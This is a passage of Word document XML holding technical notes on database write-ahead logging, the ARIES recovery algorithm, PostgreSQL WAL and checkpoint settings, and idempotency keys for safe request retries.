        <w:t xml:space="preserve">    old_values:    bytes   // before image (for undo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ADC643" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    new_values:    bytes   // after image (for redo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199BA2D4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    checksum:      uint32  // verify log record integrity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C2521F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D51E17" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F0465A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Recovery algorithm (ARIES — Algorithms for Recovery and Isolation Exploiting Semantics):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C7CE21" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="513B7CE3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Phase 1 — Analysis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7232F371" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Scan WAL forward from last checkpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B2343B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Build:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8A90C6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Transaction table: which transactions were active at crash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E0F7DD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Dirty page table: which pages were modified but not yet flushed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41919D8C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A55C98C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Phase 2 — Redo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1821B07E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Replay ALL WAL records from oldest dirty page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7C80D4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Restore database to state at moment of crash (including uncommitted changes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4667218D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7F0492" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Why redo uncommitted changes?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDF59E4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    An uncommitted transaction's changes might have been flushed to disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F883540" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    (write-behind caching: dirty pages can be flushed before commit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576FC5A5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Redo: restore the exact state at crash time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FE2C45" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F55166" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Phase 3 — Undo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08407320" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  For each active (uncommitted) transaction at crash:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8D4787" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Apply undo records (old_values) in reverse order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FDC2A8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Restore as-if the transaction never happened</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5321A536" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCBDDF6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Write undo completion to log (compensating log records)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440EFBEF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE3EA4D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Result: database has only committed transaction effects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA043B7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E52C914" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>ARIES innovations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F8D902" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Steal (allow uncommitted pages to be flushed): enables write-behind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAA0C46" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  No-force (don't require all pages flushed at commit): enables batching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA5BE82" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748A5C56" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  These two together: maximum write throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B054AA5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Traditional alternatives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150DA271" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    No-steal: all uncommitted pages in memory (memory pressure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471D7E53" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Force: flush all dirty pages at commit (write amplification)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5184159C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533DEB3F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  ARIES: neither restriction → best performance, correct recovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0976A71B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="27F57AC5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>PostgreSQL WAL implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F73A7BE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  WAL segment files: 16MB each, named by LSN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F6E522" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  WAL writer: background process, flushes WAL buffer to disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C143A3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754C8879" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Synchronous commit (synchronous_commit=on):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141C7602" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    COMMIT → flush WAL to disk → return to client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E7DB82" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Durability: committed transaction survives crash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DCC738" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Latency: +1-2ms for fsync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D383A4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486DEB51" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Asynchronous commit (synchronous_commit=off):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE959DE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    COMMIT → return to client immediately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02297284" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    WAL flushed in background (wal_writer_delay=200ms default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1AF5C4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Latency: lower (no fsync in commit path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24532272" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Risk: last 200ms of transactions lost on crash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245D2967" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Use: for non-critical data where performance matters more than durability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250A0F47" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF8D121" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Checkpoint:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7B8EE8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Periodically: flush all dirty pages to disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2826270C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    After checkpoint: WAL before checkpoint can be discarded (not needed for recovery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB4C180" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63702E4B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    checkpoint_completion_target=0.9: spread checkpoint I/O over 90% of checkpoint interval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ACCCDC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    → Avoids I/O spike at checkpoint: smooth disk utilization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3BF70D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4081937A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    After checkpoint: crash recovery only replays WAL since last checkpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46037C6C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Checkpoint every 5 minutes: max 5 minutes of WAL replay after crash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC9118E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Idempotency — The Key to Safe Retry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B331A7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why idempotency is the foundation of fault-tolerant systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F84AEEE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6037C371" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Network request fails: did the server receive it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56519DDE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Timeout: request may have been:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142222FF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    - Received and processed (response lost in transit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA53FD7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    - Received but not yet processed (server slow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8F0594" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    - Never received (network failure before arrival)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD5DCF4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268A3C7B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Safe retry only if: re-sending the request produces the same result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203F0B3C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  This is idempotency: f(f(x)) = f(x)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9EBA64" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D614DA5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Idempotency by request type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EC7913" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  GET (read): inherently idempotent (reads same data each time, ignoring freshness)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EDA858" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  DELETE: idempotent if "already deleted" is treated as success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725FF4A8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  PUT (replace): idempotent if same payload produces same state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6639D62E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  POST (create): NOT inherently idempotent — creates new resource each call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DA8AEF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    → Requires explicit idempotency key to make safe to retry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0210E611" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  PATCH (partial update): depends on semantics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D56DB96" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    "set field to value": idempotent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6832F949" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    "increment field by 1": NOT idempotent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069256AA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371375E0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Idempotency key pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009DDC1C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Client generates unique key per logical operation (UUID v4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4311C775" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Client sends key in header: Idempotency-Key: 550e8400-e29b-41d4-a716-446655440000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1DB092" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0B808B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Server behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664F347A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Check: have I seen this idempotency key before?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079D2050" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31ED576F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    If no:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794003E7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Process request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E2B92B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      Store: (idempotency_key → result) with TTL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE67106" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Return: result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068ADB2F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1807520C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    If yes (retry):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE36422" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Return: stored result (same as original)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D855B06" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Do NOT process again</w:t>
      </w:r>
    </w:p>
